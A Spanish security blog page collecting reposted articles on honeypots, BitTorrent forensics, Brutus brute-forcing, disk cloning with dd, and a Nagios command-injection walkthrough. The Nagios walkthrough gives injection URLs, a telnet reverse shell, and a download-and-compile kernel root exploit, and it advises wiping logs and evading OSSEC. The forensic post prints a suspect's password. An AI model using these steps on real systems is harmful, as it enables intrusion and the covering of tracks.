Alta interacción - Redes Trampa

Siguiendo con los post de conexion inversa les dejo este que tambien me gusto bastante , de nuevo gracias al autor, por favor revisar web del autor.

----------------------------------------------------------------------------------------------------

Hola lectores,

Hoy vamos a ver algún diseño de Honeynet de alta interacción.

Para ello vamos a utilizar lo siguiente:

• Una máquina con Windows XP sin Service Pack ninguno y sin actualizar, si lo que queremos es que entren al sistema, en caso contrario un Windows XP totalmente securizado y con una aplicación web vulnerable, en mi caso suelo utilizar DotNEtNUKe en sus primeras versiones.
• Un detector de intrusos en la máquina victima (Snort) que recolectará los eventos de los ataques
• Un gestor de logs que recupere esos eventos y los mánde a un sistema centralizado, para ello empleamos OSSEC y un servidor Linux que los almacene.

Quiero reseñar que Yago Jesús de SecurityBydefault utilizo en la Campus Party el programa 'obfuscator' no os perdaís esa entrada en el blog, ya que es muy interesante, al igual que Eduardo que en su blog nos habla en estas entradas sobre honeynets.

¡¡EMPEZAMOS!!

Lo principal es tener configurada en la máquina victima la detección y envío.

1.- SNORT (DETECCION DE INTRUSOS)

En la máquina victima descargamos e instalamos SNORT (hay que descargarse también Winpcap).

Snort es un sniffer de paquetes y un detector de intrusos basado en red. Es un software muy flexible que ofrece capacidades de almacenamiento de sus logs tanto en archivos de texto como en bases de datos como lo es Microsoft SQL y MYSQL. Implementa un motor de detección de ataques y barrido de puertos que permite registrar, alertar y responder ante cualquier anomalía previamente definida.

Este IDS implementa un lenguaje de creación de reglas flexible, potente y sencillo. Durante su instalación ya nos provee de cientos de filtros o reglas para puertas traseras, denegación de servicios, etc...

Una vez instalado el programa podemos dejarlo 'correr' en modo 'servicio' (demonio en Linux), de esta forma:

c:\>snort.exe /INSTALL /SERVICE
Los parámetros que voy a emplear son:

c.\>snort.exe -v -i2 -l c:\snort\log\ -c c:\snort\etc\snort.conf

Que viene a decir:

Se lanza snort en modo de muestra por pantalla (-v) , que escucha por la tarjeta de red 1 (-i1), que guarda los logs que se generan (-l) y que lee el fichero de configuración snort.conf (-c)

En pantalla ilustrativa vemos como se lanza snort y como detecta un escaneo de NMAP.



2.- OSSEC (GESTOR DE EVENTOS)

Ossec es un proyecto 'open source' de gestión de Logs, que monitoriza una máquina, y que detecta las anomalías que puedan producirse en el sistema. Para hacer esto usa sobre todo una herramienta para la detección de rootkits, otra para revisar la integridad de ficheros y ejecutables del sistema, y por último un potente sistema para analizar logs.

En cuanto a la arquitectura del sistema, usa básicamente un modelo de cliente-servidor, con lo que tendremos una servidor centralizado que se encarga de recibir y actuar en base a la información que reciba de los agentes que, en definitiva, son las máquinas que están siendo monitorizadas y atacadas. La forma de actuar del servidor es, por una parte, enviando notificaciones, y por otro lado, si así se configura, generando reglas firewall que se ejecutarán en los propios agentes.

Su instalación es sobre Linux, siendo muy sencilla (utiliza asistentes basado en preguntas y respuestas), quizás el principal requisito es la necesidad de un compilador como GCC

Una vez instalado el servidor, necesitamos instalar el Agente

La instalación cliente es un ejecutable Windows que vamos a instalar en la máquina victima, es tan sencillo que no requiere explicación, tan solo poner la IP del servidor de Logs, puerto y eso si, clave privada que identifica al agente con el servidor. Para ello vamos a emplear el comando que nos proporciona el servidor para la creación de agentes. Entre las diversas opciones vemos que es capaz de crear la clave que posteriormente podremos copiar en el agente.

Una vez este configurada estas opciones, tan solo nos queda reiniciar el servidor OSSEC y ya estamos dispuestos a recibir los logs de los ataques que se produzcan

3.- SISTEMA VULNERABLE

Como indicaba anteriormente, voy a poner un sistema que realmente atraiga a los malos, para ello empleo DotNetNuke en sus primeras versiones, que contienen XSS y SQL Injection, es decir un entorno preparado y 'precocinado'. Esta versión con un poco de habilidad permite el acceso por SQL Inyection al sistema.

En el caso de que consigan una Shell (cmd.exe) también se llevarán una sorpresa, dado que instalaremos un programa 'espía' que monitorize todas las acciones llevadas a cabo, desde consola o con entorno gráfico, para ello hemos selecionado 'Golden eye' que ya hable en anteriores post y que me lo encontre en el análisis de una máquina.

Este programa funciona en modo silencioso, es trasparente a los antivirus y perfecto para nuestra trampa.





Ahora con todo esto, solo queda esperar y aprender...

FUENTE:

http://conexioninversa.blogspot.com/2009/08/alta-interaccion-redes-trampa.html

Forensics en P2P ( Bittorrent-Bitcomet ) - Parte I

bueno como siempre nuestro amigo de conexion inversa nos brinda el apoyo y el amor a la informatica forense , por esta razon realizo ya hace tiempo una entrada dedicada al forensic en bittorrent muy excelente es por eso que se las comparto a las personas que no la hayan visto y tambien sirve como mirror xD, muchas gracias a el por todo.

sin mas detalles aqui les dejo la entrada.

-------------------------------------------------------------------------------------------------

Hola lectores,

De todos es conocido la utilización de las redes P2P con objeto de compartir o descargarse alguna 'copia de seguridad' de algún programa 'necesario' o visualizar algún vídeo de las fiestas del pueblo. ;-)

Por otro lado el mal uso de este tipo de programas puede provocar fugas de información o accesos no deseados a nuestra máquina. También en España hay casos sonados sobre la mala utilización de las redes P2P, como el caso de CCOO

Hoy vamos a ver como analizar algunos de los productos más utilizados en las redes P2P basándonos en un caso real.

Hace poco nos ha llegado el caso de analizar una máquina de un cibercafé que supuestamente ha realizado descargas de ficheros con pornografía infantil. En un principio todo apunta a la utilización de redes 'peer to peer' y se sospecha del uso de Bittorrent dado que está instalado en la máquina.

La recopilación de pruebas se ha realizado obteniendo una copia integra del disco con 'dd' y en un entorno de explotación (vmware) para el posterior análisis en linea.

El objetivo de este tipo de pruebas es obtener direcciones IP, ficheros descargados, carpetas compartidas, usuarios, etc.

Con el conjunto de evidencias recogidas le tocará al fiscal presentar las pruebas pertinentes y a partir de ese punto, quedará pendiente del juicio.

Bittorrent

BitTorrent es un protocolo pensado para el intercambio de ficheros entre iguales (peer to peer o P2P). El protocolo Bit Torrent está basado en software libre.

A diferencia de los sistemas de intercambio de ficheros tradicionales, su principal objetivo es el distribuir un mismo archivo a un grupo de personas, forzando a todos los que descargan un fichero a compartirlo también con otros. La distribución se realiza por medios convencionales como un pequeño fichero con extensión .torrent. Este fichero es estático, por lo que a menudo se encuentra en sitios web.

Un fichero 'torrent' contiene la dirección de un servidor de búsqueda, el cual se encarga de localizar posibles fuentes con el fichero o parte de él.

Normalmente, el nombre de un archivo torrent, tiene el sufijo “.torrent”. Los archivos torrent tiene una parte llamada “mostrado o anuncio”, la cual especifica la dirección o URL del tracker, y una sección “información”, la cual contiene los nombres de los archivos, sus tamaños, longitud de piezas utilizadas, y la huella SHA1; toda esta información es usada por los clientes para verificar la integridad de los datos recibidos.

Cuando un usuario comienza la descarga de un fichero, BitTorrent no comienza por el principio del fichero, sino que se baja por partes de forma aleatoria. Luego los usuarios se conectan entre sí para bajar el fichero.

Algunos de los clientes basados en Software que utilizan este protocolo son: Ares, Azureus, Ktorrent, Bitcomet, utorrent.

Introducción a los Ficheros .torrent

Si abrimos con un editor de texto un archivo .torrent nos encontramos con un diccionario que contiene las siguientes claves:

• announce: cadena que representaLa URL del tracker

• created by: (cadena opcional) Nombre y versión del programa usado para crear el archivo torrent.

• creation date: (entero opcional) La fecha de creación del torrent en formato de época UNIX.

• encoding: Formato de codificación del fichero

• files: Sólo aparecerá en el caso de que sea un torrent multi archivo. Es una lista de diccionarios (uno para cada archivo, pero con una estructura diferente a info). Cada uno de estos diccionarios contendrá a su vez información sobre la longitud del archivo, la suma MD5 y una ruta (path) en donde debe ubicarse el archivo en la jerarquía de directorios.

• length: (entero) Longitud del archivo en bytes.

• path: (cadena o entero) El nombre del archivo o directorio donde se almacenarán los archivos

• name: El nombre del archivo

• piece length: Este parámetro es un entero que representa el número de bytes de cada pieza. Piezas demasiado grandes causan ineficiencia y piezas demasiado pequeñas forman un archivo .torrent más pesado. Actualmente se aconseja fijar el tamaño de cada pieza en 512 KB o menos para archivos de varios GBs.

• pieces: Cadena que representa la concatenación de la lista de claves hash de cada parte del fichero compartido. Las claves hash son generadas utilizando SHA-1 con un resumen de 160 bits y un tamaño máximo por parte de 2^64 bits. Este conjunto de claves se utiliza como mecanismo para asegurar la integridad y consistencia de una parte, una vez ha sido completada la descarga de dicha parte.

Bien, con esta introducción empezamos a realizar nuestro análisis.

¡¡EMPEZAMOS!!

Como disponemos de la copia en formato dd, vamos a utilizar Mount Image pro (también empleamos FTK Imager) para montar el disco virtual y acceder al fichero NTUSER.DAT

Lo que vamos hacer es revisar el software instalado, para ello importaremos este fichero a la utilidad WRR (Windows Registry Recovery) de MITEC, siendo este el resultado:



En la anterior pantalla vemos la ruta donde se ha instalado un cliente. En este caso es Bitcomet.

Siguiendo con la revisión, en la siguiente pantalla vemos dos claves muy reveladoras.

IERefUrl: Que contiene el sitio desde donde se ha conectado para obtener el fichero .torrent
IEWbPageTitle: Que contiene el titulo de la ventana del torrent a descargar.

Ambos contenidos de estos valores están codificados en Hexadecimal



Para obtener el resultado del sitio web donde se conecto vamos a convertir de Hexadecimal a Ascii.

El valor truncado en la imágen de la clave IERefUrl es :

68:74:74:70:3a:2f:2f:6c:69:73:74:73:72:76:38:38:2e:70:6c:61:79:2e:63:6f:6d:2f:74:6f:72:72:65:6e:74:73:2d:64:65:74:61:69:6c:73:2e:70:68:70:3f:69:64:3d:34:31:34:39

Para convertirla utilizamos cualquier conversor que dispongamos. Si no tenemos ninguno podemos utilizar de forma 'on-line' este que acabo de utilizar y disponible desde aquí.



Como veis el sitio web 'listsrv88.play.com', es una evidencia muy concreta que nos servirá para su posterior análisis.

NOTA: ¡¡Ojo!! Si instalamos la versión sobre Windows Vista o Windows 7 la clave del registro donde se encuentran estas dos subclaves están en:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2693945775-50245416-85377012-1000\Software\BitComet\BitComet

Si seguimos analizando con la utilidad WRR nos encontramos que la aplicación que por defecto abre los ficheros .torrent es Bitcomet. De esta forma descartamos que otro programa este interactuando con nuestro entorno.



En la siguiente pantalla, comprobaremos en la clave del registro 'RecentDocs' (Documentos recientes), si últimamente ha sido utilizado algún fichero .torrent.
Como vemos la cadena 0 (cero) contiene en hexadecimal el último fichero accedido.



El valor truncado en la imágen anterior del valor 0 (cero) es:

66:6f:72:65:67:69:72:6c:73:2d:66:72:69:65:6e:64:73:2d:6f:6e:6c:79:31:35:2e:64:76:64:31:2e:69:73:6f:2e:74:6f:72:72:65:6e:74

y que una vez convertida por el método anterior nos da el último fichero accedido, es decir este:



Recordamos que en Windows 7 se haya en:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\torrent

Evidencias en ficheros

Otra forma de obtener evidencias son editando y comprobando los siguientes ficheros:

• downloads.xml
• bitcomet.xml
• my_shares.xml

downloads.xml:

Contiene las descargas actuales en que se encontraba el sistema en ese momento. Una vez más en Windows 7 se encuentra en:
C:\Users\pedro\AppData\Local\VirtualStore\Program Files\BitComet.

El contenido del fichero downloads.xml incorpora lo siguiente:



Como podemos ver en la imagen anterior nos da información del tipo de fichero descargado, fecha, hora y tamaño. Como podemos apreciar no muestra los ficheros ya descargados o eliminados, cuestión importante en este análisis.

Bitcomet.xml:

Contiene la configuración del programa. Se haya la información importante como las carpetas que se comparten, usuario y contraseña (en caso de estar activo), configuración del proxy y servidores a donde se conectaba.





my_shares.xml

Contiene los ficheros compartidos y lo que es más importante, mantiene un histórico de aquellos ficheros que se han descargado, aunque se hayan eliminado.


Conclusiones

Partiendo de que el usuario que se descargó los ficheros con ponográfia infantil habia dejado la máquina tal cual y no había desinstalado ni borrado ningún fichero, fue sencillo obtener la información. Por otro lado deciros que la mayoria de esta gente no se preocupa o desconoce formulas anti-forensics que por supuesto para nosotros es muy obvio, no obstante he aquí algunos de los resultados, otros han sido omitidos por motivos de confidencialidad.

Hemos obtenido la siguiente información:

Usuario: Antoine
Password: p4p3
Servidores a donde estaba conectado (ver imagenes)
Ficheros torrent (compartidos actualmente y borrados)

Haciendo un análisis más profundo y que exceden de este post, sacaremos más información de la máquina como ultimos accesos a páginas web, vídeos e imágenes visualizadas, memoria, paginación . etc, etc...

En próximos post, comentaremos más sobre este tipo de programas haciendo especial incapie en Azureus tema muy discutido por las fuerzas de seguridad, dado que es complicado el análisis forense sobre este producto.

FUENTE:

http://conexioninversa.blogspot.com/2009/08/forensics-en-p2p-bittorrent-bitcomet.html

Aprendiendo a manejar brutus desde cero

Bueno este post lo hago rapidamente antes de irme para el congreso del cual estare opinando y compartiendo con ustedes.

El brutus muchas personas lo conocen y por nombre es facil deducir que aplicacion tiene.

El sigueinte tutorial nos muestra como romper una autentificacion http , me diran para que sirve esto y pues bueno les respondo...para realizar pentest o para distraernos un poco de la vida (romper autentificacion en routers, paginas web etc.. ya depende de la creatividad y de la sabiduria).

Bueno no entro en muchos detalles ya que me cojio la tarde asi que sin mas bla bla bla les dejo el link , espero practiquen y coloquen las experiencias del mismo, recuerden que hay muchos mas programas para el mismo fin.

Link

http://euitio178.ccu.uniovi.es/wiki/index.php/Empleo_de_Brutus_para_romper_la_autentificación_HTTP

NOTA:algunas veces deja de funcionar pero no se preocupen el link funciona

Saludos roboticos

PEN-TESTING: ROOT EN LA DMZ GRACIAS A UN 0-DAY

Este es otro eco de una gran entrada de nuestro amigo eduardo , como siempre dejo el link al final del articulo.

-------------------------------------------------------------------------------------

1. INTRODUCCIÓN.

Una de las tareas diarias del equipo de seguridad es revisar los últimos exploits que salen y ver si afectan o no a las empresas para las que trabaja. Hoy, al mirar la lista de vulnerabilidades que recibo cada día de SECUNIA, ha llamado mi atención una de ellas, la siguiente:

TITLE:
Nagios "statuswml.cgi" Command Injection Vulnerability

SECUNIA ADVISORY ID:
SA35543

VERIFY ADVISORY:
http://secunia.com/advisories/35543/

DESCRIPTION:
A vulnerability has been reported in Nagios, which can be exploited
by malicious users to potentially compromise a vulnerable system.

Input passed to the "ping" parameter in statuswml.cgi is not properly
sanitised before being used to invoke the ping command. This can be
exploited to inject and execute arbitrary shell commands.

Successful exploitation requires access to the ping feature of the
WAP interface.

The vulnerability is reported in versions prior to 3.1.1.

En este artículo, vamos a reproducir el exploit y vamos a usarlo para hacernos root en el servidor que tiene nagios corriendo, lo que nos dará acceso a todos los servicios de todos los servidores importantes de la empresa. Desde el servidor de nagios, toda la red estará a nuestros pies. La vulnerabilidad no es tan grave como parece, ya que es necesario estar autenticado para ejecutarla, pero es eso es en caso de que los admin realmente hayan requerido autenticación vía htaccess o algún mecanismo similar, que no es siempre el caso ...

Como dicen en las pelis: basado en hechos reales.

2. REPRODUCIENDO EL EXPLOIT.

Tras unas cuantas pruebas y búsquedas en google, se llega a la conclusión de que la ejecución de comandos tiene un formato como esto:

http://empresa.es/nagios/cgi-bin/statuswml.cgi?ping=192.168.1.0;cat /etc/passwd

Es decir, al ejecutar la query obtenemos esto:




Y el archivo que descargamos contiene, aparte de los resultados del ping, el fichero /etc/passwd.

La dificultad al reproducir el exploit es simplemente encontrar el separador del comando ";", pero no es tan difícil de imaginar si leemos entre líneas la descripción.

3. HACKEANDO EL SERVIDOR.

Teniendo en cuenta que el apache no corre como root, vamos a hacer lo siguiente:

- ver qué version del kernel tiene.
- conseguir una shell
- buscar un exploit para ese kernel
- bajar el exploit y compilarlo
- ejecutar el exploit
- celebrarlo!!

Adicionalmente, deberíamos borrar los logs del apache para que no quede rastro de nuestra intrusión, pero en este caso no importa. También deberíamos borrar todo rastro de los logs del sistema que pueda dar pistas de nuestra conexión.Veamos todo paso a paso:

4. PASOS PREVIOS.


(a) versión del kernel

Antes de nada, tal y como hemos explicado, vamos a averiguar la versión del kernel. Para ello "ejecutamos" esta URL: statuswml.cgi?ping=192.168.1.1; cat /proc/version



Como podemos ver, se trata de un redhat. Vamos a ver qué version leyendo el archivo redhat-release. Esta es la url a ejecutar: ping=192.168.1.1; cat /etc/redhat-release.

Ahora sabemos que es un RHEL5 con un kernel 2.6.18-8, para el cual encontramos el siguiente exploit, vmsplice. Como podemos leer en milworm, el exploit cubre todos los kernels desde el 2.6.17 hasta el 2.6.24.1, en particular el nuestro.

b) ¿está instalado gcc?

Debemos averiguar si podemos usar el compilador o no. Si no es así, tendremos que instalar nosotros una máquina virtual con el mismo sistema operativo y compilar allí el exploit. Para comprobar si está instalado gcc, ejecutamos simplemente ping=192.168.1.1; gcc --version. Y esto es lo que obtenemos:


gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.


Perfecto, así nos ahorramos trabajo. De no ser así, como hemos dicho, nos habría tocado compilar en otra máquina, subir el exploit pre-compilado o bien instalar gcc, pero esto último canta un poco.

(c) ¿están instalados netcat, lynx y wget?

Ahora vamos a usar otro procedimiento para ver los paquetes instalados. Vamos a ejecutar ping=192.168.1.1; rpm -qa, que da la lista de todos los paquetes instalados en el servidor. Luego, con un simple grep podemos ver que, efectívamente, están instalados tanto wget y lynx como netcat, aunque este último realmente no nos hace falta. De los tres sólo vamos a usar lynx para bajarnos el exploit, y ni siquiera éste sería necesario.

(d) ¿qué procesos corren?

La siguiente query es muy elemental: necesitamos saber qué procesos corren, para tomar las debidas precauciones. Esto se hace lanzando un simple ps axuf y examinando la salida. Entre ellos, observamos los siguiente:


root 2070 0.0 0.0 1732 412 ? S Feb04 0:00 /opt/ossec/bin/ossec-execd
[...]


Aparte de, obviamente, tener el nagios corriendo y el apache también. Malas noticias. El OSSEC es un detector de intrusos que puede darnos muchos problemas. Esto significa que no podemos tocar ningún archivo del sistema, ni arrancar nuevos servicios, ni instalar rootkits, ... Pero nada de eso nos hace falta. Afortunadamente, o trístemente, según criterios, nuestro exploit no va a dar ningún tipo de señal de alarma.

Nota: el carácter ">" no funciona (está filtrado), ni siquiera codificado en hexadecimal. Así que tenemos que buscar métodos más complicados para bajar el exploit.

5. CONSEGUIR UNA SHELL

Existen dos tipos principales de shell, la directa y la inversa. La directa consiste en dejar un proceso escuchando en el servidor víctima y conectarnos a él, y la inversa en hacer que el servidor se conecte a nosotros. En nuestro caso, este servidor está en la DMZ, lo cual quiere decir que no vamos a poder conectarnos a un puerto que no sea el 80, ya que todo va a estar cortado por firewall. Por lo tanto, usaremos una shell inversa.

Normalmente, es fácil encontrar que un servidor puede salir a los puertos 80 y 25, así que usaremos eso para establecer nuestra shell. Para ello, ejecutaremos lo siguiente:

(a) en nuestra máquina, dejamos dos netcat escuchando, uno en el puerto 25 y otro en el 80


nc -vv -L -p 25
nc -vv -L -p 80


La opción -L es para que no se desconecte y no perder la sesión. En linux esta opción no está incorporada, por lo que usaremos este netcat modificado.

(b) en el servidor, usaremos telnet (no necesitamos netcat) para conectarnos a nuestra máquina, como sigue (192.168.1.10 es mi IP):


statuswml.cgi?ping=192.168.1.0; telnet 192.168.1.10 80 | /bin/bash | telnet 192.168.1.10 25


Esto lo que hace es leer la entrada desde mi puerto 80, ejecutarla y enviar la salida a mi puerto 25. Es una shell un poco cutre, pero funciona, es shell inversa y no requiere de netcat. ¡¡¡Más que suficiente para que el firewall ni se entere!!!

Importante: para cada comando, hay que darle a ejecutar a la URL.

6. HACERSE ROOT.

Esta es la lista de comandos que ejecutamos:


lynx --dump http://www.milw0rm.com/exploits/5092 > /tmp/exploit.c
ls -al /tmp/exploit.c
cd /tmp/
gcc exploit.c -o exploit
ls -al /tmp/expl*
./exploit
whoami


Alternativamente, podemos ejecutar gran parte de ellos desde la URL si nos resulta más cómodo. Por ejemplo, podemos pasar este comando ping=173.45.235.65; gcc /tmp/exploit.c -o /tmp/exploit

Y éste es el aspecto que tiene pantallazo de la salida:



Tras ejecutar los comandos, tenemos una shell de root.

7. CONCLUSIÓN.

En este artículo, hemos repasado como conseguir una shell ejecutando comandos a través de la url y como bajar y compilar el exploit, consiguiendo una shell de root y saltándonos el IDS local (ossec).

Como hemos visto, aunque es un proceso más que laborioso y realmente puede ser un lío ejecutando cosas en la url, es posible coger un 0-day y hacerse root en un plazo de tiempo de unas pocas horas. Afortunadamente, nagios no está nunca disponible desde internet y, además, este exploit require autenticación, por lo que no es tan-tan peligroso, pero hay que tener cuidado.

Un 0-day puede ser suficiente para que caiga toda nuestra red. Por eso, es importante tener una buena política de seguridad, la única forma de que no nos revienten la red al mínimo descuido.

Saludos y hasta pronto.

FUENTE:http://hacking-avanzado.blogspot.com/2009/06/pen-testing-root-en-la-dmz-gracias-un-0_24.html

CLONACIÓN DE DISCOS CON "DD"

Bueno alguna vez hize un laboratorio para la comunidad y el blog pero no estoy seguro que si lo postee aqui.

De todos modos les traigo un eco de una entrada de eduardo el cual es muy basico y sencillo para que cualquier persona empieze en este cuento, al final dejo el link directo para los interezados.

--------------------------------------------------------------------------------------------------



1. INTRODUCCIÓN.

Se ha planteado la siguiente pregunta: ¿cómo se clona un disco para que sea admitido como prueba judicial?

Hay que tener en cuenta que este problema no es lo mismo que clonar un windows para nuestro amigo o vecino. En un juicio cada bit cuenta. Una pequeña modificación hará que la defensa pueda alegar que las pruebas aportadas por la otra parte pueden proceder de la manipulación de los datos, y la causa sería archivada. Debemos garantizar la integridad de los datos. Por lo tanto, necesitaremos clonar bit a bit, lo cual excluye usar herramientas como GHOST, además de hacer que el proceso dure horas en lugar de "un rato".

2. CLONACIÓN.

La herramienta que usaremos será knoppix, un LIVE CD de linux sobradamente conocido y que cualquier experto admitiría como herramienta válida. Y el comando que usaremos para copiar el disco, un clásico en linux, será dd.

Es importante clonar el disco entero, y no partición a partición, ya que en el espacio entre particiones, el espacio no usado y los sectores defectuosos puede haber oculta información importante.

Arrancaremos la knoppix dejando sólo conectado el disco que queremos clonar. Lo primero que haremos será guardar el hash del disco, y esto lo hacemos así:


knoppix@localhost# sha1sum /dev/sda
knoppix@localhost# cc503d99c9d736af9052904a6ab14931b0850076

El hash es la "firma" del disco. Un número asociado unívocamente al disco que nos servirá para identificarlo y para garantizar que los datos no han sido alterados.

Ahora, procedemos a clonar el disco. Para ello, conectamos, por ejemplo vía USB el disco sobre el que haremos la copia, que supondremos es reconocido por la knoppix como /dev/sdb (esto puede verificarse ejecutando fdisk -l). Hay que tener en cuenta que el disco sobre el que clonemos deberá tener capacidad al menos la del disco origen, para que quepa toda la información. Y ya podemos clonar:

knoppix@localhost#dd if=/dev/sda of=/dev/sdb

Tras lo cual, verificamos que el hash del disco que hemos clonado coincide con el que teníamos arriba:

knoppix@localhost# sha1sum /dev/sdb
knoppix@localhost# cc503d99c9d736af9052904a6ab14931b0850076

Ahora, dado que coinciden, puede ponerse todo a disposición judicial, o hacer lo que corresponda.

3. CONCLUSIONES.

Como veis, hemos tenido gran cuidado en:

(a) usar sólo herramientas sobradamente standard y reconocidas
(b) comprobar que el clon es idéntico al original

Ambas cosas son necesarias durante el proceso de peritaje judicial.

FUENTE:http://hacking-avanzado.blogspot.com/2009/07/clonacion-de-discos-con-dd.html